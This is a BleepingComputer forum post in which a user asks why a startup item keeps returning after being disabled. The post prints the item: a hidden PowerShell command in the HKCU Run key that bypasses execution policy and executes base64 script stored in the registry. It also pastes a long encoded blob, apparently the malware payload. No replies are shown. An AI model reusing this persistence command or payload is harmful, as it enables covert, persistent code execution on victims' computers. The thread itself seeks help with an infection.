Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Startup item keeps coming back after disabling it


 • Please log in to reply
6 replies to this topic

#1 jhefreyzz

jhefreyzz

 • Members
 • 8 posts
 • OFFLINE
 •  
 • Local time:02:57 AM

Posted 21 December 2015 - 08:44 PM

Hello I'm so frustrated on how this thing would vanished on my computer system. It keeps checked even though I disabled or uncheck it in the msconfig

here's what I am referring to.

 

Microsoft Operating System  Microsoft Corporation C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\FeiSholEpOohbCv').sSqBn)));  HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 

I try to delete the registry key but I can't delete it.

Going through the Run registry and found it but it keeps coming back.

 

What should I do.

I scanned my computer already with MBAM, Rogue Killer, Microsoft Windows Defender yet I get no possible virus infection.

 

Moreover I try to reg query it and the result is this:

 

ElDQkcwN05hWjV4RW1FWUJJYVl6NGFMcHVkSUlTcTI2aGt4bXI5bTloQ0ZQSDJreFFCbkRkMThyZEQ2K
0x1UXg4c2J4bEd3ZVk5SXFWMXQvMkJKRmprd1NyWnl1WmxraEtRaUxSMFU3WUk4Y2t5TzdsRGRxbjhle
EsyNERVNWp1WkRSWVl5NjZhckdsdFNwaXVKZm12eUl4Z0c5NXo0Y3V4dTc2d2JXbmtBRnRsVnpBcXcrM
GNTWno4dHBUWWpmNS9xb0N2UXdrWllndXlVS00vZVU2b1NSSE4vY3JuTEZHTnJya2ZxVHRMTTRKeVRtR
kV6RFE2T1hEd0w1dHZmWWlZdGFKTkppWG10VFNtQ2FNTFdnZ1k1cm91Z1NRNW9oaDJZc2cwUjdqVytOO
EhKYXpKVFU5b3JGb0NETTVzV3NWd0RYVXRTTlV4ZEkzM1FqS205c3FQWkRva3RuL2NmODFuK3ByVVhDe
WM2YXAxNDhDcVI0TGlRYy9aYXQrNTZOang3VHI5WnBRODB2VzF4Yk1ETVJPcXJqVU16SVVOK080Zml4S
nIzRHhMYU14ODNTaFhoamdYSFlGNFRpRTdFQ1hzb0pIaFE1NzN2dWFsMEtuVktYY2NWcWVsUms3d1R0V
0dkL09BcU9zNmVHaVd1elN1cWRGSmJXbVVzeXhRdmRheW1CcUFNak1XRGhnOEJUdVl0aU11WVJ5YVdYO
TRxelRlSXFnSzV2T1lkZlkwYmZRSnk2WGRXSjhoZGRia1FEcmsycURhV1lCYzM4WGU1ZTlhRmV4L0JUc
FYwZUZrVGllN3BqQ0w0WTBYY25nQUJSRWFBQTNHbmRyNForTHl1UmIvVFFCUnBWUzMyOHhqazFMMTU4M
zFqekdWbGdXVjZJengvS3hBeXJKWEhKN0Q5TWNhZkFBNVY4bXlOVjRMVmlPVXZENnJBbzREY09XejZDR
nIyR1BSSklSMUE3dW9pNXRWb0FxK3NrRFhnK2txVDBlanUrMXdrU2dQTlNTK1VudFNqSzI5TUJyejZxd
0ZSei81Q1dMT3hwNWhqUGFXVk82U1Q1UTJlZGhvVkllNzZuQy9zQURuQUxncDVQblJiWXRCSHVzZWxCT
nptR1FLNkNDWDZFTFNWdnJPRFFEVVl1ZFZ4SzFpZk4ydWVkRm1RSjVGc1JNOHp3clZrQ3BNWHFWb2lwY
0UyUXJNU1I2NndRL1YraElUcWIvdThNMVVVNUxzOC96MWNtRDZaTzI5eWp0VGI2N1UzMzkxU096WGdOY
U5jUk8yVkhTUTRJdU1lNGs5N0RsUGg5YXJRYkVOQ0V4N1pqNGNUR1Y5TUFEOWI5TXZxWUpVQ3lnRW8xb
lMrRDN3L1V5QVJveGpkUGhqbnZNUktIR29CUmx1ZEVJejAvMlVmbjl1Nmo2ZWorY2x6VmtwNEtRSkU3W
WR3K1NMNEpmenlvRS9qdCtMZlIxK3U5TXR3Mm8ydzBFN1dXaEZvOFMxS3pOYnBMZHhpMWVSWjZSVDlIb
0VQbzBqTkxWTjlGalN4K2lzSC9YS2liajltZU1lUWw0WUNVYzRKMnR4Z0FFcUloNnNjLy95VUQ0NDJiU
FVKdWdkVnlHRjlzQjlLYU96YTF0dHAvd2hIMEhjL2dJUjJ6akN0eDdFdzZQcHJjNHdVTzN0REpCcjdVc
VAxVllITlJUWm11WFFLQWZtMFdEdmVDaHg5Z1RESGlRQ0Jza015TmhROC8yZG13clBzR09vaG1TU0F2a
0JsMnRuK1I5bk5tNEtJSWNpUzc5SUdBankyTG5GejJldXYyeVhuNUF3U1VMV0Q4dk9sUm9lYURrRU05U
WZvT1RVZ1pTRVFxb2toUFhrTXpGZEtxcllSb3lkVXJLMTZyT1pEMDFjS3F2cmxnMWlwT21DeHZMdkFnb
VlzcEJkK2Q1aENwSlVIZ0g4Sjdoa1JXTGZ6c2NvMmRlRHJnSnhHTTZmNTNLb1NHb3d5blZGZVZQMURha
DVIWXREdVk3a2tiS3k2Um9FcjcxU0VZY1hjVEp4Uk1FbENwOFpaNVg0c3FVc0tpVVU2aWY5cEhnZFdTR
Tc5R1padEhEVHFrYkwrRElQRXp6NkZjaCtqM1VZVmdCRnVESzBHYnA2UjkyT3phSmtYdHhaZHR6UFhzV
2F4OU9tVXJMNFR2T29jWGN2VzY5clowY3BNdkVmSjFUbHZhWDVUZW4wYmZYUnFDYUo3OFFDRittQXJMV
WJMbHdrcTViTEZjRkdIakJ1dTE2Si9tdDF4RVlhVmZhU3JadFlJelB6UkpLWk5CUWQ2MXpBQ2FkS29BY
U5aTXIvSitBaFc5U2RZNXkwMnM1TFQveU5zZU9PY3JwQU93cVN3eGZCaXdQMVM2cEVqd25JdjAwUlprO
WNoNFZKR09aZWgwT3VpSmNheHBvcDFLWlRzZTE3QkpyNWRFSURHKy91Smh0VG05YkhwREJvRmhZMkJjL
0VBdnhXQVF3VHpHeTlOR0thWThGblgzT2FRK0t3a05iY1h1dGVOT3BHUkQrSmZlZE9OQnMzZUtqY2dvM
GFsUmlVcThZVFYrMERXN3c1L3BCVW51eU1NWFlPNHJyS1dEaklWU3hMMkd6SVpxVVZsZWs2dlI0OFUvM
lZuRitsTVdtZjIwdnpqU2lEQ3NGWTZMc0o2TXpaL012YnA5cm95ZnoyZGtHUlcvODU4WnpwMGNvNktVV
VYyM0N2SWNmN0FSY3ZLTlNVTmJpdTI1cFBUVFlyQU9HckZzcHB4aFlOVjhnSjBDTTNjK1FYT3BDWDlsU
ElCSXRjVW5PbHpnSXFTNHVsYVNNaG04ZCtZY2xpRmFPUXQ3RU0wWjBUWDFpY3ZCRTFadU1sM1U0ZU1ZM
UpQNlpqb1JpR3pKbTFkZDE0a1hKbDJaRHQxRURrMTh3MGgyT2NwM3dCaFBaRGRONXBET20vVHh5SzNkW
GdVZmZRcXRNbEgwL294c1huMHFQcmxsUTJ0NmltUGNuK1VZZDE0cVBjNDMxbWtFWWxqbGozMDh0T05YW
lFLTkx4OFo5NUNVVHhMenhGeEk0MTFWWURLM09EQVo1U1ZkREVpYmZSSlRteU14TVAyL2p4WDBmbWZZM
mE0cTM1VDZmcU05SXZoNkkrZHhEMUtheHM3ZWhKMUwxeS8raVVPYzVpV1YxcWJPWElzY0tZcTc1eERjU
UxLMktjZWU1R2Y5b0VybXdmb0xWTThvMk83OXZDZVQzUm1vZmxqRHhwRyt6dW9kY2ZyWUhkdHNjeTNtS
3dYc2MrSEp0UXRDeUtvamtzMlhlVVl0cnN3VjZ4T3V0ai9ZL1REelpJVS9PdE9jTkZOTzBPTkFhRlJrN
jdxODAwcnJRbTB6L092Ti9ML01Ra1huNlNrR1pGS2JnNVFodkNNR0oyMG14Yi9uNUl3VU9oZVdYQThjV
DFOSmNGRVczK2VLbkFYbkJnZmhObWlpSmJLaGRacW51czQ2bmRkTVE5TFZzRE5Gc1NEU3VlTEtHM21YW
DlITStSOUUyTVl3VHpiWFVqWVZ4a245S3NNTGNuY0VSUUlhVlhpd2Q2enVTSm5VMmdQYVdaMXVZdW1WS
VJzZnp3TXY3WnNTcnNOd0x0aHpJeFRTdGo5bmJQZjFnQkZnQk44NXYvSjFxZVhpRzZ1MHlILzZJQldQc
XFRTUtXOWExb0NYWTZhbTV0c2xjZGo0bmtZRWNZSTZZaW9QODNEcGVXbStTcVRZREVodG04T3l2bnY3c
HhEVGdMYVhWbzl6V3JJUDdGMVJRSkxvOCtNTE11aUVkZzBLUEJzSW12MFRaQ3VBU2ZuQkZFdENuNWJMY
ndIWnduTnByYkNCcFVNVUhDcWs2QXFta1RuV25Fb2pwbUFtNkM1eWJBNFY1WjlEWmZzS2VlZXJhMHJTU
m5FQ0FsVDdSS3RVaFE1ZWFBeElHeWQvR1BPMVVMTEd3R0wwNHh5bmJpU0pyb2xxcVArczc3LzBvVFhjV
UtRRng1bnhIeXI5ZnV2VDdlMmdMSUZPdXk4QWtESW5LUURZaVk3K1FxM1F5UnhTb1J6bFZ3dGgwUG1uV
3ovcnphS2d6WERSTys3OXV0ZldSSittMlJVaENLYmhXcUVzZ3l4VzRrMVJDSGVyN3BqYmI0Y3g5dUVtR
EdGak9zSDdOY041c0sxb1Z1VkNUdmtPZmhTYkRFOGZITHNvNHYvYUVXdjA5eGYyMUxUdy85YUF5N3ZOb
GovM1BlOEhyZFdqeXJ3c2ZMczVRbkF1MklXTWJUV1JscnFMV1RxTDNId0lrL0JVSS9yWEJSUTNYL1dRd
TYrRkRDZFF6Q3RCVnFETGE2bzVaNTNMVlJHbkxCVHRYRlQrbFV4YnNqQWJHcTZFN0E5N2Y4Zmp2Qzd0N
3lxcjBuUDl5dFdKMWZyMm0xVTRQei9SUmJXZEcrQkluazRnTEVaQ3FzNnMrYVliVUFSckU4TjRBUXRXN
Gl2S09ZK1dEdzNzb01TMjBxMHpFUkNnSG9ZUmtSMm9vQVdIME4rY083d2xXck44Z3NNRXdGT2d3OXVQZ
3YwY1pyRXhuSklOZExXa3g1RFN2WkV1NE5wK1B6VWZYQ2IvSDRsRHJmT1hOek9yWHovTTZYSVE2K2R6M
EN4NitMNy9IcllLWVU4elgwdWl0dk92WGxzT3RpeUhXZVNqZUF0bXZWd3NXRXRoTmFTZEdFcldmaElnT
VlsQVp6b05vWUc5aEpHZW44czkwMkZWZ0hQS211TTI3dm4xODZFQmRWNkxYYTRmWVFkU01KYjNHYzJER
k5ZZlVDeU1nQXF4RnFzWnhPUzhrZkhUN2FRZVJHSmJXZ2VEd0dJZDRJMDd5YWdNR0xNWklzaDd1blI1N
WV4Q053Wlp3UmtoMSt4ZUVZbmVjYWZlaFJ1bFZyd3kraG03UUxxL3hiTDFvT0llaDh3Y3AyZWovaUFXR
2E5WjVXazNuVDlabWxDWDducFkxOUhXNmpDM0xuaDdnTjZYWE5BYTd0eDdKNXN5RGNpVTVXTVNKclhne
m5nVDYydWt4MVlLaFJCbURsU0MwbFNiQldQck1GUHpJSjFHV3lNekl6SjUzM2E1Y0pGdm03bDJIRXZWW
DdLYU9wdnRzdFVWUG9PVVdZeHlXVW9YMld1RGRlWmlwOWxkNnpra1dnZDZIWDBnUm9IMmFiUENtSUxnc
klTR3cvZUZTVHRrZ251VHJKZEFPYmRFTTlvWE4vVjJFV2xJWWh3VllHQUtFNytsRmpOd1I4MStpeVBpO
G5jQWEwWktsTk1WUDQrR3lOSy9qM1pjSjQ4dFE5TXB4VVFCclZxUUIrdFVsbEU1V1cwMnQ4UlEzamZrZ
1R2VkpMTDMzNnVxbXZVYnhycnV2aGtkNC9UK2Ura2tOaU81ZHR1MkVHOFRqNFF3c0E3dTJBVEw3bUtPb
W5pcXgrdUhTcXVXUnlQUEMyOHh1ZFZNbmxyalNnMlZXU242RXhSR0xIeTNIUmcxcUx6WHEwYnFQTENLd
2hOSk43TnlwVk9lVTdCakhFdVpNOVVxMEZ1SHp4MmxRbnEvTXlDZWJVMnBKemFNSmtwRGg4U1VKa3NwV
kFaVE5qRHlXbzVnYnVnWUp2U21CcVBMaThmODRSUnk0N3lIU0VpQ3BpTENDcEQ3czVic0Vad0hjLzZBS
mpCNERVOFNxbGFSMWdiWm0zaHU3L3EyL3VLalcrelpMVjFvQlRJSWd3endVOVI2M3UvWjNGZisvOU1WM
mRpcXVBTGNOWDJ6QzMrSzBPQURhaUVnRWN0SW05eWRBREVQTFlDOUY2eWgzOHoySnQ4N3htNVlmMW5Yd
0l0WkgxV1BzV0x3UEtLeXhNNDlUcG9qTkdyb1BUdmlDWWZZRzJKVkNUN05ITThCMmZKdmFGbjAwQ3lLN
HQ4a3hGUytVeGE5VWRrL2d0anRVUDhsME5nZ1AyamlKQ3V4MEMwUHNmUGFYbnR6czAxUGlwR01BRmVSe
TFzQUYvZ3haaDFEWVlIV24zNXp5VUlaa1VEMVdFbWw0c3hKTFczcHd6SUJzUEg1VEh0UlZreTgwcXFSR
jYvcnFNMEt3VUZmOTBMdkNSZGFJaDF1ODJOemxTUXdJL3c1V3Jydmx6bjhuVUtDUldVWDdlWVdCTXZvY
W1qM2dXUkFlL0t5WkZhVXJJMjQ3aTZsUzhlNVM4YVhXaTZNTjdGNXdmVnoxYVpHVXg3VDZyMVgvVGhLa
2tqRnJrRytIV1RVOHd6Z1pyYjRlWVptVHlYM2VYR2RVdnR0RDgzUkJvRnlNOEZlaUlBTGZRWThiZjFSa
UkzMEhSZ3ZnTUNzR1ZPRzEraDRVTVA2YjBTaHJJb29RZ0F6MjNGZVp5aDQ3c3BnbEJUVnRlMTBKV3l1U
3VxT3loblp6U09IeDgrKzVrOXlIU09HUFhqRkVjdURVTVYzOGRlVEFHVHU1Y0VLL0liZnVWU2R5WG1Da
3REOTVmSkt5bEt3RnRDQlNBYjkweDdwTzVsUll3VzRoYjBML00zUzcyWFV6WlBHbXY2cHZ5MHJ4MUlod
lcwa0d5SWVva1AxU21tQ2RiUkl1Mlg4VVdiZ3pGWlBxVXZwU2h0OG9MTVZlRmZCdy9GSG50VzRKblMxa
EJseE1ZV0Q2b2R6alQ0WVUzYnFJV04rN3BaaG9hZW1QeWRqbVc3dTI2eU1NckI0RkZJRnhSY0lVdEZmc
FZRdnlDdlUxVnM3M0NybW9menRXMGRNK1FoQ2NmME1GYis4SWdTYUlBb1ZybFVTbDZnQytJV1lFNVVSR
VBzZ1hydDNFdGtkVkJHekhESkdCc0I0RmlEcjI2VWhFZHhUNEN5NHZWYUgydURvWFNxUmQvNUVyQ25TM
nN3eThEODhkYktaZmp2dGxjb1o0YjBOUVVpMUw4bkNkQ0RYRWlHVGVpVHliMXNlMXZMa3JaLzExcmZGa
E10blVlNTBZRURLa3M3RndyN2VqV3dGWEphUjZxNUZPcGFncWhHVEhtU2plNnJpT2M2TUVaOE5PVEhFb
i9zM0xIb3dRdDJoL2tod3BTTHFQcmtReVBsc0xrZTVKMms2S3p2QnY5OURPblNvVUVkSnk5anpMbFp3Z
kRpWUtYZHJEYkJuc1NvbS8rZmpQUTMzVDBmWmpmYys1L3F0MWdTWlZndlVESFNiYW5uRzNjNENPVkdRM
GovZGFZNzdQSnlUL3ZzWXdBMWZ1Qloyb29UbWNBT004K01hbDczVFFDSDNJdVYrWkNLVDlMSzJBMnFxe
FFlUTBRaDlxSC95Y2RIMzZlbDdFS3R5M1hXV1RPTzh0TXdVTC9lVkp0d1FkZzJXdW0yTEhCTngxZVl6Q
URpdnU5aW9hUDVkaHUxUVhxbjFmcllxb04xVlFmR2VDblV6K2hOdGNtZ2Z2ZzkvZ3RhdnFVamNUZlMrV
UtvRDZqK3RhZVpScVk3ZEhaS3Fzb1pqSkpNRkNkZ0tjMFRuekd0YnpVejl5eWFtY0RsSW1mdjQ2YlFJN
khmVUNrbnh0dTNhTDV6ejNnL05SazN1KytzMkxkM1ZDd1V2ZVI5UEg2U1hZRzBGN1NYZmkrYWFaWDV1N
nZOWG9jd2RvK2pqOXlocDJwczE4aFVqV1ZmYmdPaFVhUlJCMEJENmg3ODdmY1lNSmd4cFd4LytnMUxic
mp0SENGeHhjeGwxd1k1NVZMNVZ3K2NlamVrY3FIYWdoQWc1c1dvUDVpTEloSUFkVlNmaVlGTHoyd21Xc
3k1Y2JaazBKc3QvSjFhZmY0SDJLWWxSWVBIdnBLRE5ldGJWcmZWcGExZW14Q2phb1FJSjh4VHJaUFZqW
Ww2ZGNKTzhJTEZROFhMVHZjT2RGMituZEFjZDYyUDFOZ1l6ajJsZk9NeGllZ1l1RXBGclBUTDlaQ2Q1S
HFETmZCeWNjMUpDZnFIZzFZNlliVUxzbERHRElFS2o0THR2a3J0WGJ0VnlXN0JqWi9KYXJtQ29wY2xZN
mVtRE1qanJTc0IzcnI0cjRNelR4NElFeHJOOXorQWJpS0dLdCtxZXc5aXlzL1JjTDRrTHNEVnlHa1ovV
DZjakxzd3RSOXNLby9tM3JMOWJxM3dCdWFzVmVjQ2F5QkRJV0NrTTNpSmtQSTB5ZUZKalo2NkRuUVdBd
UIySnJTc1Y2KzJBQmFsMVZYSDdHZmZaODk0S2d5TEQyQXVGOGI3Rnl1Mk9RSWR3ZS8zWHRCbWVadEhpU
XdMNWtxUVkrOC9venJTWTI0MUNGK3pFWlBrMGFqU3RGOTE1azJWbmFNcThJTm5xUExDdE44cEtHeDNqa
3VZbjl3WGNkdHgvK1grYUNtMW1udWhzSUpQb3JCRWVtc1FHZ3diMmtsaXFwNWl4R1BDSnZESmc1MDVDY
2NDZllFU1BwMFNaaXhEUkdsY2pEcFZqS1Nodmlmb3dEaGJhK0JUemllSEVkdVJwYURtU21hdjRYSHV5U
TRnWHBMSEg3QkJKczFhemdqdm5KL2Izc2h4TTh3ZjhFNHc0ZTJCRGNMNDZGM1NkbndLeEZzeURyb29Pa
TljS1NjVHUyd2xPREc0UXBLNDdENDhqM0RhSHgwNmlDMVNwTkJCZDJjVHNmT1U4cnd0eG0wMmdySkZ4a
1FlMWcyRnJ2cXJ4OUZiZHpzc0d5VTl0OUxhQlp1MUxjM1FUT1U0ZDZhUnlGU2loazVDclpva3JvN05sQ
TRXWm4rK0I0NWM0bHFiS256MDF5bm1QemhJcjhSQmFRMUhnd2F2cHZaeGRpOFVaU2lnTllpbDJ2YzB5V
WVWNGs5VFNpUUxJUlovQzNLa215Nk9UWDI2STdwUmIza1lnME1JQW1PYmlCZTdoZEdzNmlTbVpVTnN0a
Ud2ODlYOTNoLzIvYnMxRjlpY01QMlJuNHllMWtlOGxPQjlZMW5PRFAvOU1tUDNyY1duQjdaSXhRUFEze
nc0eHNRZU9MZmZ3eWdKZkpPVXh1dmU2Q3p0YmpKMzFXTnBaakF6c0gxeGRLYUMweWVJK1NBOXZFazNrT
GgvUDBWS2ZsRGhWVXpjZXpRSG1ZSXozL2ozRVpqN1ZzSU4zOUFlbGtHWjJzd3FTOFlGQW1NVEE4N3VCQ
UZBQjY4a25nNVl4UXExSmdscjM5dzZEWDQ2TWQ5S0puSzBoTHc3MmVoZDZla2hSWEgvSGwrUGtxSWNDM
zM3aytuV3pBZ1ZoaXJiTzBYZjhIRTNBeDNJM3hzZ08xMUV2MDZLMjNuVnRLTkkxajVuajBwSFFLaE9aQ
zJudmltS1pLWVJ3NXJSVklzY2EzeWIzanEwbHdVSmg3UjU4VDlLaldqTVRzVnhlL3p5VUZOSU1yOTNTN
lhjSUtIc0R3VERkcDY0R2dEU1dXR0dDcEo4b3RMcjJSSTdaNVJaa0t0OGt6MXFpbDVSU2FLTGRRUVUvT
m1oYzZlOUp2ZkVScnJuZlJlb1ZqaDAzYyt4T0g3SnovS3o4eGhxTGFtOHpzeU5TQlZtYW1ya3hRNm1LY
2hRN3BiOUdxUDRnOEJXSHlLRGZzdVRYS2JuanRMQTR2eFFPODlzc0pCdmR1RFYzZjNXZmx4TE5sQmtUT
VQ3ekVzdXNnQWlaeklESTRwT0o1YVZMZFFBTHFoeDdWNnZza3ZZQUNHZEJENmZ6dFM3RFNnWklydmtpT
2JRYmdrMjZuTEI1WUtSN1pJUVloNFE3M2JKYmJSbWdqaUFHRFdJdVFkaWJGRndrWjh4WU9YUm5EWmkza
C92YndtTDYxc1lTZFRCN01mdW05cnRocUs2b21XdkpPUEszL3QvdlhFRkdhWUw5R2k1Q1liVWxaZW14S
UQvVWtkUk1oOXdCM3g0RW13ejdZN3FZNFJrM2RHemMxNlplZGtZWDdKL0xDQmtGZzcrU0hlazg2d295a
29WRGVLQVRmNmlpS2gvTm40ZnhoWTA3OWFFVit4bWJOdi9KY09CZFBYbTJOcXJBVjZweEJCNzhnSVZMb
Es1cy85ZjRNaTNlOUpRdEJyL0FtUFQvYy9wdHVKNC9LQlZFOWU4NmU5cEZ1Y0p4K3Zhb01lalVwS3JHc
y90MVRtSHJ0NmpCMWNTeE04a2pjc1YxUGpKei9jN1pIVlR5WjJWQTlLMW1sLzFkWDJ6dzhFYVNZR3BFa
FFrZnQ3ZG5QaTd5M0JiTlp6VmZEMGRVSTRzb251SFNaZG5aZm40ZFhSQ2FzQWlzMXFLcXl2VTd3S0k0U
DE1c2xmT3VPSXZxa2d4RzhGWkhKSDR4WUlkOEVVVTY3Vzczck81MDF1VVdtTElkcGJReEpZR3REWHY1T
VJSakprOGxHR1YyOE5wOTEwSy9hQ0dvNlpnRzVVdWhxRHpGZ09ERHpmNnZ1RFBJa25HVkE5dEpYMHFXV
itla216OHFEVXh1YTc1enRmS1BUcEFWOTk1cGNDM2NBV2RiL1NJV0cwMHJDMFo5V2ZWWVJzc1RwREgrc
Edlc3lKaXVXenVrQXRYejd3Y2RTRWo4SjB0aS9VWVNpaFdHVysvYjZUZUxCaGdodytlWHduQjd0VlBCU
lk3M0RFU08vbFpwQmNhUzRrcnRSMjc1N2RzclhGVWxPRXVPbkh3Mmk4UVV2TTJQZ1FsZ2prYUQwRytZc
HlJVU43ODhYenJZdmhsNnZMNFBqSjQyQnROeDRoZlRhZE9iZ1ZiSjhydmdQTXVGUU1UNzFxZ2hqNmZQL
2Uwdm9sbEp0aHN4V2NnTVYwMHBEbmxBaVJTWWoyallIUHloZ3M5RzFFR3hud3ZjclZwdU92cFZ1VzdDM
2hCZHE5TWV5TkVtcDBwN1VNeXdZNHNmbDRZbkluRzFtNWJ5aVhpa2RkU01oRXByc212bDVRdnA5RHFGZ
2VaQnl5ZlR1cE9nYTIrd011MVFtRHdRUGJaS2dzWGloODcvN3RSN3VtYzVGQmlCckJ0MHQ5M2dvemNxd
np6aXlkRi9Na2s4RUJQSGU5OVNLam9IU0UyVnNHNnk5Nk05RGNHYWNnUDkrKy9wVjFqNG1hMng3a0l4a
FlFbVFNWEw4RGovaG5JUzZHMjRQNmpYYzk0ZHZWc0VWMzlFdGZUdGI0V3k5Ylc3S3A3c1REQ1RKSlVSV
XNUTGpCeXljTnhZRHZncEVMYWR3bmtXTndQTTZjZG1ZKy9xTEZBLzBkS1ZvemI3OG1abjUrOWN5ZGU4N
WtvUWtQUUZCN3pXcUVjYStyMHdaLzMyRHhDY1dKWWZGTWkwczlMdHNnK3RlbmsrVUw3RkhoKzBEWHF6U
3VPakVyekt1eXEvdWdKa2FicGxjSkpVV1JvV3VCYmM2b0M4YTRGdG5qa2pZdUVsclFjRkpPbDBWeDZwU
2hvMnhET1hGNHUxZkNDazdTYnc5dlJNdjh1RlYwZUJIWU95Z3RvSjFYelVaNXdZaGMyZDNUMXJ6VG0wT
Gl3NTV2bS9JTXNGSGZEblFYNkN4a1M5UmRqQzVCcE53Uzd2anVhN1ZOQU4xd0kwaWVMVXp6OEJLdWJxT
UZtMWkxTTIwbWNEOXlFWG9NMnBpNmhWL3h0ZXZEc1RxRmVseWRNVlZaQlE0L1ZFaDNFd0JXK0FXZGgvN
UhrZGMzRFlIVDZ1SG1BVHcvQS91ZDB5RWxnL250cnZpZ0g4OFNKU1ExUlptU3p0VFNqbzNWV0lzWnJSV
mVjVzNBckpkbFphejUxR3hGaHJZaDRIYkgwTGlaMUdLcnRMUEEzSTAvWFN2ZkVVSVdjNnV1aFR5R2x6Y
2c1bXhpQlpVZm5QcVZjc0RhcTdHdEVLMXQydmgzSmMxOWhUMERyMnZ0Ky9IRm9LNmZDRmFIalVhSG00c
XpOd2grNTY2dU9BNGM5OXVYenhVdWovT1dYUTNkdHNRNUsvQmlma09BQ04vcEdnSW4yYzJyM2ROaXc5U
UdHdEIxYklQRVplQWJkdldOSjlsMUdLcTdNa1hYdW81ODZETldPRmpGZGlzSTE2alZaalNJUEM5U29XY
1hTL3ZXUlp2L2VQYld2aVNnbWFHc2RDaUNnUExkKy9CdEdoR3FIM0dQS1JRVVNuUU5ZTUpESS93VGEvY
m83cDRacXJ0bkkweXlLSFVOYUZnejNQcVF6OFBRNFBQSjdLVnlFQ2lQREZVL2F4aVcvbEJyckx2UzAvS
y8wVjc2bnZtem8wbDc3bmNXcWRFMFo3VXZ1TEdlT2E3TzgzVDlaSVg0T0I5eldxeS9CLzd4Y21ycUxRN
klyVThXNmNQWERKK0hGVXRtV1E1aDV1V25tenF2VUptNlFXNkhya3FVd1NqeldrQWN5ajRIMTdtZ0VIS
mEyZTg3T3FiSWhFSmZHbmJqM3VrMzQ3MnNqSDhVY1gxajFNWnpvS0UzUEJGTkFKS2s4NkRORG1VZFZXW
G9rYmhxYU1xVklqQ05GTGlqWDdlR1cveEZPd1V3dWZ6UzRPUTRrbkxQSDI0TEhBeXNBRmttdWNPRmo2Y
0pYZjZjbTZRWENZNHVHcEJHQXlXcWxqRmFsU0tNVjVUdXV0d1Q0ZFNkQ05HeXhoV0FleVhzQkFPVnRLb
jF1Wlo3QnRNQmcvVno3NUtybVNERHFiV2p4WkxsMk1oNnl0QnhMdlQwMnlLVGZwdDRERFdTaVpmZHhTc
3crU3dvUUpaTVBjWDJKbFhaY2tKQ1pMVkRDYjU1TWxsVTZGNU41ajdjODlQWTlDc2JQMGF6OEFycGZqR
E1MRHlPbmYzcysrV3M2MjNYVWtIUkVjam1yNEJKb0xtWUxzZ2lNdVN6L1c3dHVzY2lvUm4vR2R2c2xke
nd1Z3BvRTlhZUpFbGhYa2prV2oyRllWOG1pRE5GbW5ZMk5NNzVZSC80U1hPMlJaRDFCWXBLNktYVGRZS
m5SdHhadHgxQU16QzlSSGRhSE5QRnAzdXJOdDZPZ2hIdWExY1JXSVRuR3ZCdEJEUkhaY3ZSdWhVamVHb
mNFVXZDVTkwS2F5SG93MWdoRncxWjVzNmNBc3ZYdG9PQUQ4bDB2bkI4MnljS0lkTVdOVWYyNy9VOGNlZ
jFTYVdIbnk5Q0JFWEl1eVVvNHZnTGl3S2xPT0swc0ZBSU9ocENWTXJhaHpnR2dLOTE2RzJlMG9CZ1U2M
zFxdlRKNmNDWjh4MWlnb1cxUUJwMkNXVXBIWTJ5N0M1RndEZ3V1cXI5YkhELzNjM00vampqUWZlR0pFa
nphSFl2Z0YxNEI2VjFwMkZrMWltRThvOUN1aTZQK3A2UVB5YWhYT0hYcWk0Z2FLUlVoNXdRMkVGWk41T
WVYSHBaM2t1SkhwY2dQVDFWaC9tUkdFR010V2loYm91b0pLYmx3VG9GWmNsRml5Y3hhdUhHZEpYQk9QT
zVzSTEvUXlRdzVzSkV5Z05aUWp1VkhaM0M2U3NxNnZyd1JwbDlXYnJCWXROMHJyM01mU1lKRUVTY0VHT
WtJVE1SRlJLY2tqVkh2Nm5zNS9nR1VpdERSdkZSV3JuUVNsaUgyNmNnSjJaN2FQM2FsQ0pLODdGeXh1T
jhXNVR6MW9LMnV3UW1Gc2tCNVd2c2lLakdrKzNmUWZNNlhiSlVBZzNjNGw3WXh5VEVNUkN6RlpFUHAzc
lJKSmZLcXY5czdQRUtVZW9UbkdZT1Q1NGg3b2kyUVUzZEM0NlBuU3prVFN6dVQzcW9Na1JEMDB4Mi9uW
Dc1bzF2R1FTdTJxTmtBb0RvemZwYlJFdm9SdDkxLy9ldFpIdTNZS21hUEhRNkR1MFlJMUhKaG5NMWl0U
mVBSnR5SzFZbU1uSDJrNGVmci9WeWJXMHNOK25ndHBCSjZrTDdiZTk3UXNrQ25rOG84VzNwTVBVajBBc
GJoeVRicnR0WlVYSDE0RXR6TnBVOVVmRFpIZG5NMjRLRlJhY054cndyRFg1bmN0b0EyUE45QXMzUE04d
3E4YXRPMGd6WXJyRU1zanc1dmhiUFJnMEhScWJpRm1sOUp6Y3JXSERmOWlUZEVPcW94eFViTlk4MXFjT
GRtWXhpYW9BTjhuZGxOMTJaYkJhZzRDSmlkdXg0REJqdmZ5N25PWU1YNy93ZEVoSFZqU2ZLNXd1UFZke
Gh2TzJOYmZnTDg5KzJJQXpXRlc0K0RQcWc5dk5DTWExcWlpc0s0bHBwN0RsWmNFcVJVeURwRTd0V1ovU
zZBL21sVUdaUkY2cDQ4MkpPMFJnczNsRGY3UHNrSjZSTUdYVUw5R2s2a2VsS0N3ZEwxRnZjdDZqVHVVY
TJKY2FaQUF2V1RBeDJoblVyWExtamxhTEN1WnFxYzR6djZrV2hQR2ttNjhzM0wyNXZjM0xqYnJ1TU85L
0VxSFNHQ25ZOTRTd2V2bVBlVzNEQlNqT01hd1llZ3ZOWW5XbmE5WGh6eEYvaGFoTU1sNzlSZUIwQ2tYU
GFIQnBwOXlGdmpSNlM4anp2Z29aMGY4MDhVQXFCWi82ZHFHVmFwUk9PUCtwMTFWTWgwU0ZaSkVXUWw1R
DRxYVFZMUZyUXFwN0xVUWF1MTdlUGxoQjlLbVRMbEcyUkRYSm1kSGs4SHZ1UkE0SGRBcFYxWVFDVzBLU
